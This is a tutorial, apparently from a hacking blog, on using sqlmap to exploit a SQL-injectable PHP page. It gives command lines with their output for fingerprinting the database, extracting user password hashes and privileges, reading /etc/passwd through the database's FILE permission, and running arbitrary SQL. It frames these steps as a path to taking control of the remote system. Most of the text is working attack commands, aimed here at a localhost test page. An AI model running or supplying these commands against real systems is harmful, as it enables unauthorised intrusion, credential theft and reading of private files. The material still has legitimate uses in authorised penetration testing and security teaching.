How to hack remote database with sqlmap
In the previous post on sqlmap basics we learnt how to use sqlmap to hack a vulnerable web application and fetch the list of databases, tables, columns and data rows. In this post we shall see how to do some simple fingerprinting on the remote database to find valuable information that can be used to assist in further exploitation of a system.
So lets say we have a vulnerable url
where the id parameter is not escaped properly in the php code and suffers sql injection vulnerability. The commands to list out the databases would be
$ python ./sqlmap.py -u "http://localhost/weak.php?id=10" --dbs
Then use the -T --columns and the --dump options to list out the tables of a database, columns of a table and data in a table and so on.
Fingerprinting the remote system and its database
To find out more information about the remote system database use the option "-b". It will try to find the exact banner of the database server. Lets try it on a mysql database.
$ python sqlmap.py -u "http://localhost/weak.php?id=10" -b ..... [11:19:51] [INFO] the back-end DBMS is MySQL [11:19:51] [INFO] fetching banner [11:19:51] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [11:19:51] [INFO] retrieved: 5.1.61 web server operating system: Linux Red Hat Enterprise 6 (Santiago) web application technology: PHP 5.3.3, Apache 2.2.15 back-end DBMS: MySQL 5.0.11 banner: '5.1.61'
The output has the banner text which is "5.1.61". This is the mysql banner and clearly shows the mysql version being used. Now you can search google for any mysql vulnerabilities that might exist in this version of mysql.
The next command will fetch the list of users and roles.
$ python sqlmap.py -u "http://localhost/weak.php?id=10" --users --passwords --privileges --roles --threads=10 .......... database management system users : [*] ''@'localhost' [*] ''@'localhost.localdomain' [*] 'root'@'127.0.0.1' [*] 'root'@'localhost' [*] 'root'@'localhost.localdomain' ............. database management system users password hashes: [*] : password hash: NULL [*] root : password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 password hash: NULL ........ [*] %root% (administrator) : privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE
Getting the current user, current database and hostname information
$ python sqlmap.py -u "http://localhost/weak.php?id=10" --current-user --is-dba --current-db --hostname --threads=10 ........ [11:32:33] [INFO] the back-end DBMS is MySQL web server operating system: Linux Red Hat Enterprise 6 (Santiago) web application technology: PHP 5.3.3, Apache 2.2.15 back-end DBMS: MySQL 5.0.11 [11:32:33] [INFO] fetching current user [11:32:33] [INFO] retrieving the length of query output [11:32:33] [INFO] retrieved: 14 [11:32:38] [INFO] retrieved: root@localhost current user: 'root@localhost' [11:32:38] [INFO] fetching current database [11:32:38] [INFO] retrieving the length of query output [11:32:38] [INFO] retrieved: 5 [11:32:40] [INFO] resumed: profile_data current database: 'profile_data' [11:32:40] [INFO] fetching server hostname [11:32:40] [INFO] retrieving the length of query output [11:32:40] [INFO] retrieved: 21 [11:32:48] [INFO] retrieved: localhost.localdomain hostname: 'localhost.localdomain' [11:32:48] [INFO] testing if current user is DBA [11:32:48] [INFO] fetching current user current user is DBA: False
So in the above output we have the current user, current database, the hostname.
Reading a system file
On mysql if the database user has permission to the FILE operation, then it can read files from the file system. It can read only those files that are publicly readable or readable by the mysql user. Here is a quick example to read the /etc/passwd file.
$ python sqlmap.py -u "http://localhost/weak.php?id=10" --file-read=/etc/passwd --threads=10
sqlmap will store the file in its directory on the local file system, so that it can be read later.
Run arbitrary sql command
The sql-query option can be used to run arbitrary sql queries on the database.
$ python sqlmap.py -u "http://localhost/weak.php?id=10" --sql-query="select now();" ........... [11:50:22] [INFO] retrieved: 2013-04-15 11:51:10 select now();: '2013-04-15 11:51:10'
The last line in the output is the sql query output which was run on the remote database.
So with all the above information it gets easier to get further into the system and eventually take control of it, if possible. Sqlmap does quite a massive task by discovering the database, the data and details about the operating system. But in most cases it might not able to fully provide control of the remote system in the form of a shell.
Further techniques need to be employed to get greater control of the system and eventually root. We shall be discussing those in upcoming tutorials.